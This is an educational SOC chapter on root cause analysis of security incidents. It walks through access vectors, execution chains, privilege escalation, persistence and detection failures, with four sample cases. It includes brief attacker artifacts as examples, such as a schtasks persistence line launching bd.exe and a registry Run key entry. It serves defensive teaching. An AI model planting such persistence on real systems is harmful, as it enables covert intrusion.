Root Cause Analysis (RCA) is the process of identifying how an incident started, what enabled it, and what allowed the attacker or malware to succeed.
RCA determines the initial point of failure, not just the symptoms.
A SOC analyst must find the exact weakness—misconfiguration, user action, vulnerability, or missing detection—that allowed the incident to occur.
This chapter explains RCA in full-scale SOC depth, focusing on log evidence, investigative workflow, attacker timelines, and real SOC case studies.
What Root Cause Analysis Really Means
RCA answers the most important questions in incident response:
-
How did the attacker get in?
-
What allowed the attack to succeed?
-
What vulnerability or mistake was exploited?
-
Could this have been prevented?
-
What detection or control failed?
-
Is the root cause fixed so it won’t happen again?
RCA goes beyond identifying malware or suspicious behavior.
It digs into the origin, not the symptoms.
When RCA Happens in the Incident Lifecycle
RCA occurs after containment and eradication, during the deeper investigation led by L2/L3 analysts.
It relies on:
-
Host logs
-
Network logs
-
EDR telemetry
-
Forensics
-
User activity history
-
Configuration audits
RCA ensures complete understanding of the incident's beginning.
Core Components of Root Cause Analysis
1. Trigger Event Identification
Identify the exact moment where malicious activity started.
Example:
User clicked phishing URL at 10:32 UTC → dropper.ps1 downloaded
This event starts the entire attack timeline.
2. Initial Access Vector
Determine how the attacker first entered.
Common vectors:
-
Phishing
-
Vulnerable public-facing apps
-
Weak passwords
-
Exposed RDP
-
Stolen credentials
-
Misconfigured cloud resources
Example:
Brute force → successful SSH login
3. Execution Path
Identify what code executed and how.
Examples:
-
Encoded PowerShell
-
MS Office macro execution
-
Linux shell script in /tmp
-
DLL side-loading
Example:
WINWORD.exe → powershell.exe → payload.exe
4. Privilege Escalation Cause
Identify how the attacker obtained elevated rights.
Examples:
-
Sudo misconfiguration
-
Token theft
-
Kerberoasting
-
Exploits
Example:
sudoers file allowed user to execute bash without password
5. Persistence Mechanism
Determine how the attacker maintained access.
Examples:
-
Registry Run keys
-
Cron job
-
Scheduled task
-
Malicious service
Example:
schtasks /tn "Updater" /tr C:\Users\Public\bd.exe
6. Detection Failure Analysis
Find out why detection didn’t fire earlier.
Reasons:
-
Logging disabled
-
Rule too broad or too narrow
-
Telemetry missing
-
Threat was unknown
-
Tool malfunction
Example:
Sysmon not installed → no process creation logs
7. Control Weakness Identification
Identify which security control failed.
Examples:
-
Missing patches
-
Weak firewall rules
-
No MFA
-
Unrestricted outbound connections
-
Unmonitored DNS traffic
Example:
Public-facing Tomcat server unpatched for 8 months
8. Final Root Cause Statement
A one-sentence explanation summarizing the true cause.
Example:
Root Cause: User executed a malicious macro from a phishing email, which downloaded a payload due to lack of attachment filtering and insufficient PowerShell restrictions.
Practical RCA Workflow (SOC-Level)
Below is the exact workflow L2/L3 analysts follow.
Step 1 — Validate Timeline Start
Identify earliest suspicious action:
10:32 – User clicked phishing link
10:33 – payload.ps1 downloaded
10:34 – C2 communication established
The first suspicious event becomes the starting point.
Step 2 — Identify Attack Vector
Using logs:
-
Proxy logs → malicious URL
-
Email logs → phishing email
-
Firewall logs → inbound traffic
-
Authentication logs → brute force success
Example:
Email attachment triggered macro → malicious script executed
Step 3 — Reconstruct Execution Chain
Using Sysmon and Linux logs:
WINWORD.exe → powershell.exe → curl → payload.exe
OR
/tmp/bd.sh executed → created miner binary
Attack path shows how malware ran.
Step 4 — Determine Privilege Escalation
Check for:
-
sudo
-
exploitation
-
credential dumping
-
AD misconfigurations
Example:
4672 — Special privileges assigned to compromised user
Step 5 — Identify Lateral Movement
Firewall + Windows auth logs:
4624 LogonType 3 from infected host
Network logs:
SMB connection to file server
Step 6 — Persistence Review
Check:
-
Registry Run keys
-
Cron jobs
-
Services
-
Scheduled tasks
Example:
HKCU\Software\Microsoft\Windows\Run → updater.exe
Step 7 — Identify Control Failures
Examples:
-
No EDR on machine
-
SIEM rule too weak
-
Lack of network segmentation
-
Unrestricted outbound traffic
-
No MFA on admin accounts
Step 8 — Deliver Root Cause Statement
Final deliverable includes:
-
Trigger event
-
Attack vector
-
Failed control
-
Weakness exploited
-
What allowed escalation
-
How to prevent recurrence
Real SOC RCA Examples
Example 1 — Malware Infection from Phishing
Findings:
-
User opened malicious Word doc
-
Macro executed PowerShell
-
Downloaded payload
-
C2 communication established
-
No EDR installed
-
PowerShell logging disabled
Root Cause:
Phishing email led to macro execution due to inadequate email filtering and insufficient PowerShell restrictions.
Example 2 — SSH Brute Force → Server Compromise
Findings:
-
Public SSH exposed
-
Password-based auth enabled
-
Weak password
-
Attacker brute-forced credentials
-
Installed crypto miner
Root Cause:
Weak SSH password and lack of brute force protection allowed unauthorized access.
Example 3 — Lateral Movement in Windows Domain
Findings:
-
User credentials stolen via LSASS dumping
-
No credential guard
-
Attacker used valid credentials
-
Moved through SMB and WinRM
Root Cause:
LSASS memory exposure due to lack of endpoint hardening enabled credential theft and lateral movement.
Example 4 — Cloud Misconfiguration
Findings:
-
S3 bucket misconfigured as public
-
Data exposed externally
-
No IAM policy restrictions
-
No monitoring
Root Cause:
Public S3 bucket misconfiguration caused unauthorized external access.
Analyst Workflow for RCA
-
Collect all logs (endpoint + network + cloud)
-
Identify earliest malicious event
-
Determine entry point
-
Reconstruct execution chain
-
Identify privilege escalation
-
Identify lateral movement
-
Identify persistence mechanisms
-
Determine detection failures
-
Identify configuration or policy gaps
-
Finalize root cause statement
A thorough RCA prevents repeat incidents.
Intel Dump
-
RCA identifies the true origin of an attack, not just symptoms.
-
It requires reconstructing the full timeline from the earliest malicious event.
-
RCA includes initial access, execution, escalation, persistence, lateral movement, and detection failure analysis.
-
Common root causes include phishing, weak passwords, unpatched systems, misconfigurations, missing logging, and lack of segmentation.
-
RCA ends with a clear statement: what caused the incident and how to prevent it in the future.